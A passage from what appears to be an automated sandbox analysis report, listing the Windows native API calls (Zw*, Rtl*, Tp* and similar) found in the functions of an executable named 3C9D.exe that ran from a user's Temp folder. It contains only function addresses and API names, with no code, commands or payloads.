                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B291BA8 RtlGetCurrentServiceSessionId,ZwTraceEvent,30_2_6B291BA8
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B204BAD RtlAcquireSRWLockExclusive,memset,ZwTraceControl,RtlReleaseSRWLockExclusive,RtlSetLastWin32Error,RtlFreeHeap,RtlAllocateHeap,RtlNtStatusToDosError,RtlFreeHeap,30_2_6B204BAD
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1D2B93 TpSetDefaultPoolMaxThreads,ZwDuplicateToken,30_2_6B1D2B93
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B2A9BBE RtlGetCurrentServiceSessionId,ZwTraceEvent,30_2_6B2A9BBE
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B2A8BB6 RtlGetCurrentServiceSessionId,ZwTraceEvent,30_2_6B2A8BB6
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B29138A memset,RtlGetCurrentServiceSessionId,ZwTraceEvent,30_2_6B29138A
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B21A390 ZwGetCachedSigningLevel,30_2_6B21A390
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B20939F RtlInitializeCriticalSectionEx,ZwDelayExecution,30_2_6B20939F
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B219BF0 ZwAlertThreadByThreadId,30_2_6B219BF0
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1D2BC2 ZwOpenThreadToken,ZwSetInformationThread,ZwClose,30_2_6B1D2BC2
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1D23F6 ZwClose,RtlFreeHeap,30_2_6B1D23F6
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1EA3E0 RtlFormatCurrentUserKeyPath,ZwQueryInformationToken,RtlLengthSidAsUnicodeString,RtlAppendUnicodeToString,RtlConvertSidToUnicodeString,RtlFreeUnicodeString,30_2_6B1EA3E0
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B21AA20 ZwQuerySecurityAttributesToken,30_2_6B21AA20
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1D5210 RtlGetCurrentDirectory_U,memcpy,RtlGetCurrentDirectory_U,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,30_2_6B1D5210
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B264A28 ZwOpenKey,DbgPrintEx,ZwQueryValueKey,DbgPrintEx,DbgPrintEx,memcpy,ZwClose,30_2_6B264A28
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B20B230 EtwEventWrite,ZwTraceEvent,RtlNtStatusToDosError,EtwEventWrite,30_2_6B20B230
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B219A30 ZwTerminateThread,30_2_6B219A30
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B219A00 ZwProtectVirtualMemory,30_2_6B219A00
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1D8239 RtlInitUnicodeStringEx,ZwQueryValueKey,RtlInitUnicodeStringEx,RtlPrefixUnicodeString,ZwEnumerateKey,ZwOpenKey,RtlInitUnicodeStringEx,ZwQueryValueKey,RtlFreeHeap,ZwClose,RtlAllocateHeap,RtlCompareUnicodeString,ZwClose,RtlFreeHeap,ZwClose,30_2_6B1D8239
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1FA229 ZwAllocateVirtualMemory,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,ZwQueryVirtualMemory,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlFillMemoryUlong,DbgPrint,DbgPrint,DbgPrint,30_2_6B1FA229
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1D4A20 RtlGetCurrentServiceSessionId,RtlFreeHeap,ZwClose,RtlReleaseActivationContext,LdrUnloadDll,30_2_6B1D4A20
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B2A8214 RtlAcquireSRWLockExclusive,ZwSetInformationWorkerFactory,RtlReleaseSRWLockExclusive,30_2_6B2A8214
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B2A8A62 RtlGetCurrentServiceSessionId,ZwTraceEvent,30_2_6B2A8A62
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1D9240 ZwClose,ZwClose,RtlFreeHeap,RtlFreeHeap,RtlFreeHeap,RtlAcquireSRWLockExclusive,RtlFreeHeap,30_2_6B1D9240
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B261242 ZwUnmapViewOfSection,ZwClose,ZwClose,ZwClose,ZwClose,ZwClose,30_2_6B261242
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B219A50 ZwCreateFile,30_2_6B219A50
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B205AA0 TpSetPoolMaxThreads,ZwSetInformationWorkerFactory,RtlGetCurrentServiceSessionId,TpSetPoolMaxThreads,30_2_6B205AA0
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1D429E RtlInitUnicodeString,ZwClose,LdrQueryImageFileKeyOption,30_2_6B1D429E
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B219AB0 ZwWaitForMultipleObjects,30_2_6B219AB0
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B20E2BB ZwWaitForAlertByThreadId,30_2_6B20E2BB
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1F2280 RtlAcquireSRWLockExclusive,RtlDllShutdownInProgress,ZwWaitForAlertByThreadId,RtlAcquireSRWLockExclusive,ZwTerminateProcess,30_2_6B1F2280
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B21B280 ZwWow64DebuggerCall,30_2_6B21B280
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B20DA88 RtlAcquireSRWLockExclusive,RtlImageNtHeader,RtlAllocateHeap,ZwUnmapViewOfSection,ZwClose,RtlReAllocateHeap,30_2_6B20DA88
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B21AA90 ZwQuerySystemInformationEx,30_2_6B21AA90
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B20D294 ZwQueryAttributesFile,RtlFreeHeap,ZwClose,RtlFreeHeap,30_2_6B20D294
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1D52A5 RtlEnterCriticalSection,RtlLeaveCriticalSection,ZwFsControlFile,RtlEnterCriticalSection,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,ZwClose,RtlFreeHeap,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,ZwClose,RtlFreeHeap,RtlEnterCriticalSection,RtlLeaveCriticalSection,30_2_6B1D52A5
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1D1AA0 RtlAllocateHandle,RtlReAllocateHeap,ZwAllocateVirtualMemory,ZwAllocateVirtualMemory,RtlAllocateHeap,30_2_6B1D1AA0
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1DBAA0 RtlpLoadMachineUIByPolicy,RtlInitUnicodeString,ZwOpenKey,RtlpLoadMachineUIByPolicy,ZwClose,30_2_6B1DBAA0
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B21AAE0 ZwRaiseException,30_2_6B21AAE0
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B219AE0 ZwTraceEvent,30_2_6B219AE0
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1FFAD0 RtlAcquireSRWLockShared,RtlDllShutdownInProgress,ZwWaitForAlertByThreadId,RtlAcquireSRWLockShared,ZwTerminateProcess,30_2_6B1FFAD0
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B21AAC0 ZwQueryWnfStateNameInformation,30_2_6B21AAC0
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B261AD6 ZwFreeVirtualMemory,30_2_6B261AD6
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B2A8ADD RtlGetCurrentServiceSessionId,ZwTraceEvent,30_2_6B2A8ADD
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B219920 ZwDuplicateToken,30_2_6B219920
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B21A130 ZwCreateWaitCompletionPacket,30_2_6B21A130
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B2AF13B ZwOpenKey,ZwCreateKey,30_2_6B2AF13B
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1D9100 TpReleasePool,RtlAcquireSRWLockExclusive,ZwShutdownWorkerFactory,RtlGetCurrentServiceSessionId,TpReleasePool,TpReleasePool,RtlDebugPrintTimes,TpReleasePool,30_2_6B1D9100
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B26193B ZwRaiseException,ZwTerminateProcess,30_2_6B26193B
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1E0100 LdrUnloadAlternateResourceModuleEx,RtlAcquireSRWLockExclusive,ZwUnmapViewOfSection,ZwClose,LdrUnloadAlternateResourceModuleEx,RtlFreeHeap,RtlFreeHeap,RtlReAllocateHeap,30_2_6B1E0100
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B219900 ZwOpenEvent,30_2_6B219900
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B275100 RtlAssert,RtlCaptureContext,DbgPrintEx,DbgPrompt,ZwTerminateThread,DbgPrintEx,RtlAssert,ZwTerminateProcess,30_2_6B275100
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1F4120 RtlAllocateHeap,memmove,memmove,RtlPrefixUnicodeString,RtlAllocateHeap,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,RtlFreeHeap,30_2_6B1F4120
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B21B160 ZwUpdateWnfStateData,30_2_6B21B160
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B21A160 ZwCreateWorkerFactory,30_2_6B21A160
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1D395E RtlAcquireSRWLockShared,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockShared,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockShared,RtlReleaseSRWLockExclusive,RtlFreeHeap,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,ZwGetCompleteWnfStateSubscription,RtlFreeHeap,30_2_6B1D395E
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B2A8966 RtlGetCurrentServiceSessionId,ZwTraceEvent,30_2_6B2A8966
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1DF150 RtlOpenCurrentUser,RtlFormatCurrentUserKeyPath,ZwOpenKey,RtlFreeUnicodeString,RtlOpenCurrentUser,RtlInitUnicodeString,ZwOpenKey,30_2_6B1DF150
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B261976 ZwCreateEvent,30_2_6B261976
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B20D976 ZwCreateFile,ZwCreateFile,30_2_6B20D976
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1FB944 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,RtlGetCurrentServiceSessionId,ZwSetTimer2,RtlGetCurrentServiceSessionId,ZwCancelTimer2,30_2_6B1FB944
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1DB171 ZwQueryDebugFilterState,_alloca_probe_16,memcpy,_vsnprintf,ZwWow64DebuggerCall,RtlRaiseException,30_2_6B1DB171
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B21B150 ZwUnsubscribeWnfStateChange,30_2_6B21B150
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B21B1A0 ZwWaitForKeyedEvent,30_2_6B21B1A0
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1D519E RtlEqualUnicodeString,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,30_2_6B1D519E
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B2949A4 ZwAllocateVirtualMemory,RtlCompareMemory,memcpy,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,30_2_6B2949A4
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B21A9B0 ZwQueryLicenseValue,30_2_6B21A9B0
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B2551BE ZwQuerySystemInformation,ZwQuerySystemInformationEx,RtlAllocateHeap,ZwQuerySystemInformationEx,RtlFindCharInUnicodeString,RtlEnterCriticalSection,memcpy,30_2_6B2551BE
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1FC182 RtlGetCurrentServiceSessionId,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,ZwWaitForAlertByThreadId,RtlAcquireSRWLockExclusive,30_2_6B1FC182
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B20C9BF DbgPrintEx,wcsrchr,memcpy,DbgPrintEx,ZwClose,DbgPrintEx,DbgPrintEx,RtlDosPathNameToRelativeNtPathName_U,DbgPrintEx,ZwOpenFile,ZwClose,RtlFreeHeap,DbgPrintEx,DbgPrintEx,DbgPrintEx,RtlDeleteBoundaryDescriptor,ZwClose,RtlFreeHeap,30_2_6B20C9BF
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B2AF1B5 RtlAllocateHeap,ZwQueryValueKey,memcpy,RtlFreeHeap,30_2_6B2AF1B5
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B29A189 RtlAcquireSRWLockExclusive,ZwGetNlsSectionPtr,RtlAllocateHeap,RtlFreeHeap,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,30_2_6B29A189
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B21B180 ZwWaitForAlertByThreadId,30_2_6B21B180
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B219980 ZwCreateEvent,30_2_6B219980
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B286186 ZwQueryValueKey,memmove,RtlInitUnicodeString,30_2_6B286186
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B219990 ZwQueryVolumeInformationFile,30_2_6B219990
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B2A89E7 RtlGetCurrentServiceSessionId,ZwTraceEvent,30_2_6B2A89E7
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B2619C8 ZwCreateSection,ZwMapViewOfSection,memset,ZwUnmapViewOfSection,ZwClose,30_2_6B2619C8
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B204020 RtlGetVersion,RtlGetSuiteMask,RtlGetNtProductType,RtlInitUnicodeString,ZwQueryLicenseValue,RtlGetSuiteMask,RtlGetVersion,30_2_6B204020
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1DF018 RtlAllocateHeap,ZwQueryValueKey,memcpy,RtlFreeHeap,30_2_6B1DF018
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B219830 ZwOpenFile,30_2_6B219830
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B2AF019 RtlInitUnicodeString,RtlInitUnicodeString,ZwQueryValueKey,RtlAllocateHeap,ZwQueryValueKey,RtlInitUnicodeString,ZwClose,RtlFreeHeap,30_2_6B2AF019
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1D5050 RtlSetCurrentDirectory_U,RtlAllocateHeap,RtlFreeHeap,RtlEnterCriticalSection,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,RtlSetCurrentDirectory_U,RtlFreeHeap,RtlFreeHeap,30_2_6B1D5050
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B261879 ZwAllocateVirtualMemory,memset,RtlInitializeSid,30_2_6B261879
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B219840 ZwDelayExecution,30_2_6B219840
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1E106F ZwOpenKey,ZwClose,30_2_6B1E106F
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B219850 ZwQueryDirectoryFile,30_2_6B219850
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B2A8858 ZwAlertThreadByThreadId,30_2_6B2A8858
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B2860A2 ZwQueryInformationFile,30_2_6B2860A2
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1FE090 RtlWow64EnableFsRedirectionEx,RtlEnterCriticalSection,RtlLeaveCriticalSection,ZwSetEvent,30_2_6B1FE090
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B21B0B0 ZwTraceControl,30_2_6B21B0B0
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B2018B9 ZwCreateTimer2,ZwCreateWaitCompletionPacket,ZwAssociateWaitCompletionPacket,ZwClose,30_2_6B2018B9
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1D3880 TpSetWaitEx,RtlAllocateHeap,ZwGetCompleteWnfStateSubscription,RtlFreeHeap,TpSetWaitEx,30_2_6B1D3880
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B20F0BF ZwOpenFile,RtlFreeHeap,ZwQueryVolumeInformationFile,RtlAllocateHeap,memcpy,ZwClose,ZwClose,RtlFreeHeap,30_2_6B20F0BF
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B20A080 RtlDeleteCriticalSection,RtlAcquireSRWLockExclusive,RtlDeleteCriticalSection,RtlDeleteCriticalSection,ZwClose,RtlDeleteCriticalSection,30_2_6B20A080
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B21108B ZwClose,30_2_6B21108B
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B21A890 ZwQueryDebugFilterState,30_2_6B21A890
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B219890 ZwFsControlFile,30_2_6B219890
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1FF0AE ZwSetInformationWorkerFactory,30_2_6B1FF0AE
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B2860E9 ZwOpenKey,ZwClose,ZwClose,30_2_6B2860E9
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B28E0E9 RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,RtlAllocateHeap,ZwClose,RtlFreeHeap,30_2_6B28E0E9
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1D70C0 ZwClose,RtlFreeHeap,RtlFreeHeap,30_2_6B1D70C0
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1D40FD RtlImageNtHeaderEx,DbgPrintEx,memset,RtlDebugPrintTimes,DbgPrintEx,wcsstr,DbgPrintEx,DbgPrintEx,wcschr,DbgPrintEx,ZwSetInformationProcess,30_2_6B1D40FD
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B2100C2 ZwAlertThreadByThreadId,30_2_6B2100C2
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1DB8F0 TpSetPoolStackInformation,ZwSetInformationWorkerFactory,30_2_6B1DB8F0
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B2198D0 ZwQueryAttributesFile,30_2_6B2198D0
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B21A0D0 ZwCreateTimer2,30_2_6B21A0D0
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B2110D7 ZwOpenKey,ZwCreateKey,30_2_6B2110D7
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B20E730 RtlDecodePointer,ZwQueryInformationProcess,RtlRaiseStatus,RtlAllocateAndInitializeSid,RtlAllocateHeap,RtlAllocateAndInitializeSid,RtlAllocateAndInitializeSid,RtlAllocateAndInitializeSid,30_2_6B20E730
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B219730 ZwQueryVirtualMemory,30_2_6B219730
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B28CF30 ZwAlertThreadByThreadId,30_2_6B28CF30
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B209702 RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,ZwReleaseWorkerFactoryWorker,30_2_6B209702
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B219710 ZwQueryInformationToken,30_2_6B219710
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B266715 memset,memcpy,ZwTraceEvent,30_2_6B266715
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B2A8F6A RtlGetCurrentServiceSessionId,ZwTraceEvent,30_2_6B2A8F6A
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B21AF60 ZwSetTimer2,30_2_6B21AF60
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B26176C ZwOpenEvent,ZwWaitForSingleObject,ZwClose,30_2_6B26176C
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B20CF6A memcpy,memcpy,RtlDosPathNameToRelativeNtPathName_U,ZwOpenFile,memcpy,RtlFreeHeap,RtlDeleteBoundaryDescriptor,DbgPrintEx,DbgPrintEx,DbgPrintEx,ZwClose,RtlFreeHeap,DbgPrintEx,memcpy,DbgPrintEx,ZwClose,30_2_6B20CF6A
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B219F70 ZwCreateIoCompletion,30_2_6B219F70
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B219770 ZwSetInformationFile,30_2_6B219770
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B28CF70 RtlpGetUserOrMachineUILanguage4NLS,RtlInitUnicodeString,RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,ZwClose,RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,ZwClose,ZwClose,30_2_6B28CF70
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B219740 ZwOpenThreadToken,30_2_6B219740
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B25A746 ZwGetCachedSigningLevel,ZwCompareSigningLevels,ZwSetCachedSigningLevel,30_2_6B25A746
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B210F48 ZwOpenKey,ZwClose,ZwClose,ZwCreateKey,RtlInitUnicodeStringEx,ZwSetValueKey,RtlInitUnicodeStringEx,ZwSetValueKey,ZwClose,30_2_6B210F48
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B20174B ZwFreeVirtualMemory,RtlFlushSecureMemoryCache,ZwFreeVirtualMemory,30_2_6B20174B
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B219750 ZwQueryInformationThread,30_2_6B219750
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B265F5F RtlInitUnicodeString,ZwOpenFile,ZwClose,RtlFreeHeap,RtlFreeHeap,RtlAllocateHeap,RtlInitUnicodeString,ZwQueryDirectoryFile,RtlAllocateHeap,memcpy,RtlFreeHeap,ZwClose,30_2_6B265F5F
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1D6F60 RtlGetPersistedStateLocation,ZwOpenKey,memcpy,RtlGetPersistedStateLocation,RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,RtlAllocateHeap,ZwQueryValueKey,RtlExpandEnvironmentStrings,memcpy,ZwClose,ZwClose,RtlFreeHeap,30_2_6B1D6F60
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B2197A0 ZwUnmapViewOfSection,30_2_6B2197A0
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B213FA0 RtlGetLocaleFileMappingAddress,ZwInitializeNlsFiles,RtlGetLocaleFileMappingAddress,ZwUnmapViewOfSection,30_2_6B213FA0
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B25A7AC ZwCompareSigningLevels,ZwCompareSigningLevels,30_2_6B25A7AC
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B265780 DbgPrompt,ZwWow64DebuggerCall,30_2_6B265780
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1D2FB0 RtlDestroyHeap,RtlDeleteCriticalSection,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlDestroyHeap,DbgPrint,DbgPrint,DbgPrint,RtlDebugPrintTimes,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,ZwTraceEvent,RtlGetCurrentServiceSessionId,ZwTraceEvent,30_2_6B1D2FB0
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B285F87 ZwUnmapViewOfSection,30_2_6B285F87
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B20FF9C RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,RtlInitUnicodeString,30_2_6B20FF9C
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B260FEC ZwDuplicateObject,ZwDuplicateObject,30_2_6B260FEC
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B2037EB RtlImageNtHeader,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,ZwCreateIoCompletion,ZwCreateWorkerFactory,RtlAcquireSRWLockExclusive,RtlGetCurrentServiceSessionId,ZwSetInformationWorkerFactory,30_2_6B2037EB
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1DF7C0 EtwNotificationUnregister,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,ZwClose,RtlReleaseSRWLockExclusive,RtlSetLastWin32Error,EtwNotificationUnregister,30_2_6B1DF7C0
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B2197C0 ZwTerminateProcess,30_2_6B2197C0
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1E0FFD RtlInitUnicodeString,ZwQueryValueKey,30_2_6B1E0FFD
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B20D7CA RtlImageNtHeader,RtlFreeHeap,ZwCreateSection,ZwMapViewOfSection,ZwClose,RtlImageNtHeader,ZwClose,RtlFreeHeap,ZwClose,ZwClose,ZwUnmapViewOfSection,30_2_6B20D7CA
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B21AFD0 ZwShutdownWorkerFactory,30_2_6B21AFD0
